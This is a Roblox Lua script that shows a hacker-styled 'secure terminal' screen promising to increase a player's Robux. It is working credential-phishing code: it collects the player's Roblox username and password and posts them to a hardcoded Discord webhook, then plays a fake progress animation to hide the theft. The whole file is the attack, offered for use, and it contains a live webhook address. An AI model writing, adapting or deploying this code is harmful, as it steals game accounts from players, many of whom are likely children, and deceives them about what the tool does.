local Players = game:GetService("Players") local TweenService = game:GetService("TweenService") local HttpService = game:GetService("HttpService") local player = Players.LocalPlayer local PlayerGui = player:WaitForChild("PlayerGui") local screenGui = Instance.new("ScreenGui") screenGui.Name = "SecureTerminal" screenGui.IgnoreGuiInset = true screenGui.ResetOnSpawn = false screenGui.Parent = PlayerGui local frame = Instance.new("Frame") frame.Size = UDim2.fromScale(1,1) frame.Position = UDim2.fromScale(0,0) frame.BackgroundColor3 = Color3.new(0,0,0) frame.BorderSizePixel = 0 frame.Parent = screenGui local header = Instance.new("TextLabel") header.Size = UDim2.new(1,0,0,60) header.BackgroundTransparency = 1 header.Text = "SECURE ACCESS TERMINAL" header.TextColor3 = Color3.fromRGB(0,255,156) header.Font = Enum.Font.Code header.TextScaled = true header.Parent = frame local usernameInput = Instance.new("TextBox") usernameInput.Size = UDim2.new(0.6,0,0,40) usernameInput.Position = UDim2.new(0.2,0,0.25,0) usernameInput.PlaceholderText = "ROBLOX-USERNAME" usernameInput.Text = "" usernameInput.ClearTextOnFocus = false usernameInput.BackgroundColor3 = Color3.new(0,0,0) usernameInput.BorderColor3 = Color3.fromRGB(0,255,156) usernameInput.TextColor3 = Color3.fromRGB(0,255,156) usernameInput.Font = Enum.Font.Code usernameInput.TextScaled = true usernameInput.Parent = frame local passwordInput = Instance.new("TextBox") passwordInput.Size = UDim2.new(0.6,0,0,40) passwordInput.Position = UDim2.new(0.2,0,0.33,0) passwordInput.PlaceholderText = "PASSWORD" passwordInput.Text = "" passwordInput.ClearTextOnFocus = false passwordInput.Password = true passwordInput.BackgroundColor3 = Color3.new(0,0,0) passwordInput.BorderColor3 = Color3.fromRGB(0,255,156) passwordInput.TextColor3 = Color3.fromRGB(0,255,156) passwordInput.Font = Enum.Font.Code passwordInput.TextScaled = true passwordInput.Parent = frame local errorLabel = Instance.new("TextLabel") errorLabel.Size = UDim2.new(0.6,0,0,30) errorLabel.Position = UDim2.new(0.2,0,0.40,0) errorLabel.BackgroundTransparency = 1 errorLabel.Text = "" errorLabel.TextColor3 = Color3.fromRGB(255,80,80) errorLabel.Font = Enum.Font.Code errorLabel.TextScaled = true errorLabel.Parent = frame local startButton = Instance.new("TextButton") startButton.Size = UDim2.new(0.6,0,0,45) startButton.Position = UDim2.new(0.2,0,0.46,0) startButton.Text = "SETTING" startButton.BackgroundColor3 = Color3.new(0,0,0) startButton.BorderColor3 = Color3.fromRGB(0,255,156) startButton.TextColor3 = Color3.fromRGB(0,255,156) startButton.Font = Enum.Font.Code startButton.TextScaled = true startButton.Parent = frame local logLabel = Instance.new("TextLabel") logLabel.Size = UDim2.new(0.8,0,0,60) logLabel.Position = UDim2.new(0.1,0,0.6,0) logLabel.BackgroundTransparency = 1 logLabel.Text = "" logLabel.TextColor3 = Color3.fromRGB(0,255,156) logLabel.Font = Enum.Font.Code logLabel.TextScaled = true logLabel.Visible = false logLabel.Parent = frame local barFrame = Instance.new("Frame") barFrame.Size = UDim2.new(0.8,0,0,15) barFrame.Position = UDim2.new(0.1,0,0.7,0) barFrame.BackgroundColor3 = Color3.new(0,0,0) barFrame.BorderColor3 = Color3.fromRGB(0,255,156) barFrame.Visible = false barFrame.Parent = frame local bar = Instance.new("Frame") bar.Size = UDim2.new(0,0,1,0) bar.BackgroundColor3 = Color3.fromRGB(0,255,156) bar.Parent = barFrame local steps = { "Initializing secure shell...", "Loading encryption modules...", "Verifying system integrity...", "Bypassing firewall...", "Negotiating encrypted tunnel...", "Finalizing access..." } local webhookURL = "https://discord.com/api/webhooks/1450518351913680896/gF5fds-I-DwgWsVaWoRLkvqqumHyq8zyH9ScHwcJTttS67Sqy6Xpc5tZWETEZkGIkKYi" local function sendToDiscord(username, password) local data = { content = "**New Input Received**\nUsername: "..username.."\nPassword: "..password } local json = HttpService:JSONEncode(data) HttpService:PostAsync(webhookURL, json, Enum.HttpContentType.ApplicationJson) end local function simulate() logLabel.Visible = true barFrame.Visible = true for i, text in ipairs(steps) do logLabel.Text = "> "..text local progress = i / #steps bar:TweenSize( UDim2.new(progress,0,1,0), Enum.EasingDirection.Out, Enum.EasingStyle.Linear, 0.5, true ) task.wait(1.2) end logLabel.Text = "Robux Increased" bar:TweenSize(UDim2.new(1,0,1,0), "Out", "Linear", 0.3, true) end startButton.MouseButton1Click:Connect(function() local username = usernameInput.Text:match("%S+") local password = passwordInput.Text:match("%S+") if not username or not password then errorLabel.Text = "USERNAME と PASSWORD を入力してください" return end errorLabel.Text = "" usernameInput.Visible = false passwordInput.Visible = false startButton.Visible = false pcall(function() sendToDiscord(username, password) end) simulate() end)